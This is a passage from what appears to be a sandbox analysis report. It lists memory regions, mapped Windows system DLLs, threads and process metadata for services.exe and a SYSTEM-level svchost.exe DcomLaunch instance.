0x7ff77b54e000 end_va = 0x7ff77b54ffff entry_point = 0x0 region_type = private name = "private_0x00007ff77b54e000" filename = "" Region: id = 438 start_va = 0x7ff77b970000 end_va = 0x7ff77b9dffff entry_point = 0x7ff77b970000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 439 start_va = 0x7ffc51410000 end_va = 0x7ffc5141ffff entry_point = 0x7ffc51410000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 440 start_va = 0x7ffc53640000 end_va = 0x7ffc53687fff entry_point = 0x7ffc53640000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 441 start_va = 0x7ffc53690000 end_va = 0x7ffc5371dfff entry_point = 0x7ffc53690000 region_type = mapped_file name = "scesrv.dll" filename = "\\Windows\\System32\\scesrv.dll" (normalized: "c:\\windows\\system32\\scesrv.dll") Region: id = 442 start_va = 0x7ffc53840000 end_va = 0x7ffc53865fff entry_point = 0x7ffc53840000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 443 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 444 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 445 start_va = 0x7ffc54350000 end_va = 0x7ffc5436afff entry_point = 0x7ffc54350000 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 446 start_va = 0x7ffc54370000 end_va = 0x7ffc54389fff entry_point = 0x7ffc54370000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 447 start_va = 0x7ffc54390000 end_va = 0x7ffc54397fff entry_point = 0x7ffc54390000 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 448 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 449 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 450 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 451 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 452 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 453 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 454 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 455 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 456 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 457 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2547 start_va = 0x7ffc52cd0000 end_va = 0x7ffc52d47fff entry_point = 0x7ffc52cd0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 3406 start_va = 0x7ffc530c0000 end_va = 0x7ffc530c8fff entry_point = 0x7ffc530c0000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Thread: id = 110 os_tid = 0x41c Thread: id = 111 os_tid = 0x348 Thread: id = 112 os_tid = 0x28c Thread: id = 113 os_tid = 0x258 Thread: id = 114 os_tid = 0x244 Thread: id = 115 os_tid = 0x238 Thread: id = 448 os_tid = 0xc9c Thread: id = 458 os_tid = 0x618 Thread: id = 473 os_tid = 0xe30 Thread: id = 476 os_tid = 0xd68 Thread: id = 477 os_tid = 0x3c0 Thread: id = 478 os_tid = 0xd6c Thread: id = 479 os_tid = 0xd70 Thread: id = 480 os_tid = 0xd74 Thread: id = 481 os_tid = 0xd78 Thread: id = 482 os_tid = 0xd84 Thread: id = 483 os_tid = 0xd80 Thread: id = 484 os_tid = 0xd7c Thread: id = 485 os_tid = 0xe7c Thread: id = 486 os_tid = 0xe80 Thread: id = 487 os_tid = 0xea0 Thread: id = 489 os_tid = 0xe78 Thread: id = 490 os_tid = 0xebc Thread: id = 491 os_tid = 0x764 Thread: id = 495 os_tid = 0xef0 Thread: id = 496 os_tid = 0xef4 Thread: id = 497 os_tid = 0xca8 Thread: id = 498 os_tid = 0xcac Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x47736000" os_pid = "0x23c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BrokerInfrastructure" [0xa], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\DeviceInstall" [0xa], "NT SERVICE\\LSM" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT SERVICE\\SystemEventsBroker" [0xa], "NT AUTHORITY\\Logon Session 00000000:000063b6" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 619 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 620 start_va = 0xf988e30000 end_va = 0xf988e3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f988e30000" filename = "" Region: id = 621 start_va = 0xf988e40000 end_va = 0xf988e44fff entry_point = 0x0 region_type = private name = "private_0x000000f988e40000" filename = "" Region: id = 622 start_va = 0xf988e50000 end_va = 0xf988e63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f988e50000" filename = "" Region: id = 623 start_va = 0xf988e70000 end_va = 0xf988eeffff entry_point = 0x0 region_type = private name = "private_0x000000f988e70000" filename = "" Region: id = 624 start_va = 0xf988ef0000 end_va = 0xf988ef3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f988ef0000" filename = "" Region: id = 625 start_va = 0xf988f00000 end_va = 0xf988f00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f988f00000" filename = "" Region: id = 626 start_va = 0xf988f10000 end_va = 0xf988f11fff entry_point = 0x0 region_type = private name = "private_0x000000f988f10000" filename = "" Region: id = 627 start_va = 0xf988f20000 end_va = 0xf988f20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f988f20000" filename = "" Region: id = 628 start_va = 0xf988f30000 end_va = 0xf988f30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f988f30000" filename = "" Region: id = 629 start_va = 0xf988f40000 end_va = 0xf988f40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f988f40000" filename = "" Region: id = 630 start_va = 0xf988f50000 end_va = 0xf988f56fff entry_point = 0x0 region_type = private name = "private_0x000000f988f50000" filename = "" Region: id = 631 start_va = 0xf988f60000 end_va = 0xf988fdffff entry_point = 0x0 region_type = private name = "private_0x000000f988f60000" filename = "" Region: id = 632 start_va = 0xf988fe0000 end_va = 0xf988fe0fff entry_point = 0x0 region_type = private name = "private_0x000000f988fe0000" filename = "" Region: id = 633 start_va = 0xf988ff0000 end_va = 0xf988ff0fff entry_point = 0x0 region_type = private name = "private_0x000000f988ff0000" filename = "" Region: id = 634 start_va = 0xf989000000 end_va = 0xf9890fffff entry_point = 0x0 region_type = private name = "private_0x000000f989000000" filename = "" Region: id = 635 start_va = 0xf989100000 end_va = 0xf9891bdfff entry_point = 0xf989100000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 636 start_va = 0xf9891c0000 end_va = 0xf98923ffff entry_point = 0x0 region_type = private name = "private_0x000000f9891c0000" filename = "" Region: id = 637 start_va = 0xf989240000 end_va = 0xf989240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f989240000" filename = "" Region: id = 638 start_va = 0xf989250000 end_va = 0xf989250fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f989250000" filename = "" Region: id = 639 start_va = 0xf989260000 end_va = 0xf989262fff entry_point = 0xf989260000 region_type = mapped_file name = "lsm.dll.mui" filename = "\\Windows\\System32\\en-US\\lsm.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.dll.mui") Region: id = 640 start_va = 0xf989270000 end_va = 0xf989276fff entry_point = 0x0 region_type = private name = "private_0x000000f989270000" filename = "" Region: id = 641 start_va = 0xf989280000 end_va = 0xf9892fffff entry_point = 0x0 region_type = private name = "private_0x000000f989280000" filename = "" Region: id = 642 start_va = 0xf989300000 end_va = 0xf98937ffff entry_point = 0x0 region_type = private name = "private_0x000000f989300000" filename = "" Region: id = 643 start_va = 0xf989380000 end_va = 0xf989380fff entry_point = 0xf989380000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 644 start_va = 0xf989390000 end_va = 0xf989390fff entry_point = 0x0 region_type = private name = "private_0x000000f989390000" filename = "" Region: id = 645 start_va = 0xf9893a0000 end_va = 0xf9893a0fff entry_point = 0x0 region_type = private name = "private_0x000000f9893a0000" filename = "" Region: id = 646 start_va = 0xf9893b0000 end_va = 0xf9893b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f9893b0000" filename = "" Region: id = 647 start_va = 0xf9893c0000 end_va = 0xf9893c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f9893c0000" filename = "" Region: id = 648 start_va = 0xf9893d0000 end_va = 0xf9893d6fff entry_point = 0x0 region_type = private name = "private_0x000000f9893d0000" filename = "" Region: id = 649 start_va = 0xf989400000 end_va = 0xf9894fffff entry_point = 0x0 region_type = private name = "private_0x000000f989400000" filename = "" Region: id = 650 start_va = 0xf989500000 end_va = 0xf9895fffff entry_point = 0x0 region_type = private name = "private_0x000000f989500000" filename = "" Region: id = 651 start_va = 0xf989600000 end_va = 0xf9896fffff entry_point = 0x0 region_type = private name = "private_0x000000f989600000" filename = "" Region: id = 652 start_va = 0xf989700000 end_va = 0xf98977ffff entry_point = 0x0 region_type = private name = "private_0x000000f989700000" filename = "" Region: id = 653 start_va = 0xf989780000 end_va = 0xf98987ffff entry_point = 0x0 region_type = private name = "private_0x000000f989780000" filename = "" Region: id = 654 start_va = 0xf989880000 end_va = 0xf9898fffff entry_point = 0x0 region_type = private name = "private_0x000000f989880000" filename = "" Region: id = 655 start_va = 0xf989900000 end_va = 0xf98997ffff entry_point = 0x0 region_type = private name = "private_0x000000f989900000" filename = "" Region: id = 656 start_va = 0xf989980000 end_va = 0xf989a7ffff entry_point = 0x0 region_type = private name = "private_0x000000f989980000" filename = "" Region: id = 657 start_va = 0xf989a80000 end_va = 0xf989b7ffff entry_point = 0x0 region_type = private name = "private_0x000000f989a80000" filename = "" Region: id = 658 start_va = 0xf989b80000 end_va = 0xf989c7ffff entry_point = 0x0 region_type = private name = "private_0x000000f989b80000" filename = "" Region: id = 659 start_va = 0xf989c80000 end_va = 0xf989d7ffff entry_point = 0x0 region_type = private name = "private_0x000000f989c80000" filename = "" Region: id = 660 start_va = 0xf989d80000 end_va = 0xf989da9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f989d80000" filename = "" Region: id = 661 start_va = 0xf989dc0000 end_va = 0xf989dc6fff entry_point = 0x0 region_type = private name = "private_0x000000f989dc0000" filename = "" Region: id = 662 start_va = 0xf989e00000 end_va = 0xf989efffff entry_point = 0x0 region_type = private name = "private_0x000000f989e00000" filename = "" Region: id = 663 start_va = 0xf989f00000 end_va = 0xf98a236fff entry_point = 0xf989f00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 664 start_va = 0xf98a240000 end_va = 0xf98a33ffff entry_point = 0x0 region_type = private name = "private_0x000000f98a240000" filename = "" Region: id = 665 start_va = 0xf98a340000 end_va = 0xf98a3fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f98a340000" filename = "" Region: id = 666 start_va = 0xf98a400000 end_va = 0xf98a4fffff entry_point = 0x0 region_type = private name = "private_0x000000f98a400000" filename = "" Region: id = 667 start_va = 0xf98a500000 end_va = 0xf98a687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f98a500000" filename = "" Region: id = 668 start_va = 0xf98a690000 end_va = 0xf98a810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f98a690000" filename = "" Region: id = 669 start_va = 0xf98a820000 end_va = 0xf98a91ffff entry_point = 0x0 region_type = private name = "private_0x000000f98a820000" filename = "" Region: id = 670 start_va = 0xf98a920000 end_va = 0xf98aa1ffff entry_point = 0x0 region_type = private name = "private_0x000000f98a920000" filename = "" Region: id = 671 start_va = 0xf98aa20000 end_va = 0xf98aa9ffff entry_point = 0x0 region_type = private name = "private_0x000000f98aa20000" filename = "" Region: id = 672 start_va = 0xf98aaa0000 end_va = 0xf98ab9ffff entry_point = 0x0 region_type = private name = "private_0x000000f98aaa0000" filename = "" Region: id = 673 start_va = 0xf98aba0000 end_va = 0xf98ac9ffff entry_point = 0x0 region_type = private name = "private_0x000000f98aba0000" filename = "" Region: id = 674 start_va = 0xf98aca0000 end_va = 0xf98ad9ffff entry_point = 0x0 region_type = private name = "private_0x000000f98aca0000" filename = "" Region: id = 675 start_va = 0xf98ada0000 end_va = 0xf98ae1ffff entry_point = 0x0 region_type = private name = "private_0x000000f98ada0000" filename = "" Region: id = 676 start_va = 0xf98ae20000 end_va = 0xf98ae9ffff entry_point = 0x0 region_type = private name = "private_0x000000f98ae20000" filename = "" Region: id = 677 start_va = 0x7df5ffe10000 end_va = 0x7ff5ffe0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe10000" filename = "" Region: id = 678 start_va = 0x7ff6e080e000 end_va = 0x7ff6e080ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e080e000" filename = "" Region: id = 679 start_va = 0x7ff6e0810000 end_va = 0x7ff6e0811fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0810000" filename = "" Region: id = 680 start_va = 0x7ff6e0812000 end_va = 0x7ff6e0813fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0812000" filename = "" Region: id = 681 start_va = 0x7ff6e0814000 end_va = 0x7ff6e0815fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0814000" filename = "" Region: id = 682 start_va = 0x7ff6e0816000 end_va = 0x7ff6e0817fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0816000" filename = "" Region: id = 683 start_va = 0x7ff6e0818000 end_va = 0x7ff6e0819fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0818000" filename = "" Region: id = 684 start_va = 0x7ff6e081a000 end_va = 0x7ff6e081bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e081a000" filename = "" Region: id = 685 start_va = 0x7ff6e081c000 end_va = 0x7ff6e081dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e081c000" filename = "" Region: id = 686 start_va = 0x7ff6e081e000 end_va = 0x7ff6e081ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e081e000" filename = "" Region: id = 687 start_va = 0x7ff6e0820000 end_va = 0x7ff6e0821fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0820000" filename = "" Region: id = 688 start_va = 0x7ff6e0822000 end_va = 0x7ff6e0823fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0822000" filename = "" Region: id = 689 start_va = 0x7ff6e0824000 end_va = 0x7ff6e0825fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0824000" filename = "" Region: id = 690 start_va = 0x7ff6e0826000 end_va = 0x7ff6e0827fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0826000" filename = "" Region: id = 691 start_va = 0x7ff6e0828000 end_va = 0x7ff6e0829fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0828000" filename = "" Region: id = 692 start_va = 0x7ff6e082a000 end_va = 0x7ff6e082bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e082a000" filename = "" Region: id = 693 start_va = 0x7ff6e082c000 end_va = 0x7ff6e082dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e082c000" filename = "" Region: id = 694 start_va = 0x7ff6e082e000 end_va = 0x7ff6e082ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e082e000" filename = "" Region: id = 695 start_va = 0x7ff6e0830000 end_va = 0x7ff6e092ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0830000" filename = "" Region: id = 696 start_va = 0x7ff6e0930000 end_va = 0x7ff6e0952fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0930000" filename = "" Region: id = 697 start_va = 0x7ff6e0954000 end_va = 0x7ff6e0955fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0954000" filename = "" Region: id = 698 start_va = 0x7ff6e0956000 end_va = 0x7ff6e0956fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0956000" filename = "" Region: id = 699 start_va = 0x7ff6e0958000 end_va = 0x7ff6e0959fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0958000" filename = "" Region: id = 700 start_va = 0x7ff6e095a000 end_va = 0x7ff6e095bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e095a000" filename = "" Region: id = 701 start_va = 0x7ff6e095c000 end_va = 0x7ff6e095dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e095c000" filename = "" Region: id = 702 start_va = 0x7ff6e095e000 end_va = 0x7ff6e095ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e095e000" filename = "" Region: id = 703 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 704 start_va = 0x7ffc48880000 end_va = 0x7ffc48895fff entry_point = 0x7ffc48880000 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 705 start_va = 0x7ffc488a0000 end_va = 0x7ffc488abfff entry_point = 0x7ffc488a0000 region_type = mapped_file name = "licensemanagerapi.dll" filename = "\\Windows\\System32\\LicenseManagerApi.dll" (normalized: "c:\\windows\\system32\\licensemanagerapi.dll") Region: id = 706 start_va = 0x7ffc48b80000 end_va = 0x7ffc48b94fff entry_point = 0x7ffc48b80000 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 707 start_va = 0x7ffc48ba0000 end_va = 0x7ffc48badfff entry_point = 0x7ffc48ba0000 region_type = mapped_file name = "sebbackgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\SebBackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\sebbackgroundmanagerpolicy.dll") Region: id = 708 start_va = 0x7ffc48bb0000 end_va = 0x7ffc48bc7fff entry_point = 0x7ffc48bb0000 region_type = mapped_file name = "windows.networking.backgroundtransfer.backgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\Windows.Networking.BackgroundTransfer.BackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\windows.networking.backgroundtransfer.backgroundmanagerpolicy.dll") Region: id = 709 start_va = 0x7ffc48bd0000 end_va = 0x7ffc48be6fff entry_point = 0x7ffc48bd0000 region_type = mapped_file name = "acpbackgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\ACPBackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\acpbackgroundmanagerpolicy.dll") Region: id = 710 start_va = 0x7ffc48bf0000 end_va = 0x7ffc48bfbfff entry_point = 0x7ffc48bf0000 region_type = mapped_file name = "cbtbackgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\CbtBackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\cbtbackgroundmanagerpolicy.dll") Region: id = 711 start_va = 0x7ffc48ff0000 end_va = 0x7ffc49459fff entry_point = 0x7ffc48ff0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 712 start_va = 0x7ffc4afe0000 end_va = 0x7ffc4afeffff entry_point = 0x7ffc4afe0000 region_type = mapped_file name = "backgroundmediapolicy.dll" filename = "\\Windows\\System32\\BackgroundMediaPolicy.dll" (normalized: "c:\\windows\\system32\\backgroundmediapolicy.dll") Region: id = 713 start_va = 0x7ffc4b030000 end_va = 0x7ffc4b072fff entry_point = 0x7ffc4b030000 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 714 start_va = 0x7ffc4f8f0000 end_va = 0x7ffc4f981fff entry_point = 0x7ffc4f8f0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 715 start_va = 0x7ffc511b0000 end_va = 0x7ffc51332fff entry_point = 0x7ffc511b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 716 start_va = 0x7ffc51340000 end_va = 0x7ffc513b1fff entry_point = 0x7ffc51340000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 717 start_va = 0x7ffc51410000 end_va = 0x7ffc5141ffff entry_point = 0x7ffc51410000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 718 start_va = 0x7ffc514f0000 end_va = 0x7ffc514fbfff entry_point = 0x7ffc514f0000 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 719 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 720 start_va = 0x7ffc52730000 end_va = 0x7ffc527f7fff entry_point = 0x7ffc52730000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 721 start_va = 0x7ffc52e10000 end_va = 0x7ffc52e30fff entry_point = 0x7ffc52e10000 region_type = mapped_file name = "dab.dll" filename = "\\Windows\\System32\\dab.dll" (normalized: "c:\\windows\\system32\\dab.dll") Region: id = 722 start_va = 0x7ffc52e40000 end_va = 0x7ffc52e7efff entry_point = 0x7ffc52e40000 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 723 start_va = 0x7ffc52e80000 end_va = 0x7ffc52ee1fff entry_point = 0x7ffc52e80000 region_type = mapped_file name = "systemeventsbrokerserver.dll" filename = "\\Windows\\System32\\SystemEventsBrokerServer.dll" (normalized: "c:\\windows\\system32\\systemeventsbrokerserver.dll") Region: id = 724 start_va = 0x7ffc52ef0000 end_va = 0x7ffc52f16fff entry_point = 0x7ffc52ef0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 725 start_va = 0x7ffc52f40000 end_va = 0x7ffc5302dfff entry_point = 0x7ffc52f40000 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 726 start_va = 0x7ffc53030000 end_va = 0x7ffc530b3fff entry_point = 0x7ffc53030000 region_type = mapped_file name = "psmserviceexthost.dll" filename = "\\Windows\\System32\\PsmServiceExtHost.dll" (normalized: "c:\\windows\\system32\\psmserviceexthost.dll") Region: id = 727 start_va = 0x7ffc530c0000 end_va = 0x7ffc530c8fff entry_point = 0x7ffc530c0000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 728 start_va = 0x7ffc530d0000 end_va = 0x7ffc530dbfff entry_point = 0x7ffc530d0000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 729 start_va = 0x7ffc530e0000 end_va = 0x7ffc531a0fff entry_point = 0x7ffc530e0000 region_type = mapped_file name = "lsm.dll" filename = "\\Windows\\System32\\lsm.dll" (normalized: "c:\\windows\\system32\\lsm.dll") Region: id = 730 start_va = 0x7ffc531b0000 end_va = 0x7ffc531d7fff entry_point = 0x7ffc531b0000 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 731 start_va = 0x7ffc531e0000 end_va = 0x7ffc53211fff entry_point = 0x7ffc531e0000 region_type = mapped_file name = "psmsrv.dll" filename = "\\Windows\\System32\\psmsrv.dll" (normalized: "c:\\windows\\system32\\psmsrv.dll") Region: id = 732 start_va = 0x7ffc53220000 end_va = 0x7ffc532a5fff entry_point = 0x7ffc53220000 region_type = mapped_file name = "bisrv.dll" filename = "\\Windows\\System32\\bisrv.dll" (normalized: "c:\\windows\\system32\\bisrv.dll") Region: id = 733 start_va = 0x7ffc533c0000 end_va = 0x7ffc5349afff entry_point = 0x7ffc533c0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 734 start_va = 0x7ffc534a0000 end_va = 0x7ffc534c2fff entry_point = 0x7ffc534a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 735 start_va = 0x7ffc534d0000 end_va = 0x7ffc535c7fff entry_point = 0x7ffc534d0000 region_type = mapped_file name = "tdh.dll" filename = "\\Windows\\System32\\tdh.dll" (normalized: "c:\\windows\\system32\\tdh.dll") Region: id = 736 start_va = 0x7ffc535d0000 end_va = 0x7ffc535dbfff entry_point = 0x7ffc535d0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 737 start_va = 0x7ffc535e0000 end_va = 0x7ffc535f5fff entry_point = 0x7ffc535e0000 region_type = mapped_file name = "umpoext.dll" filename = 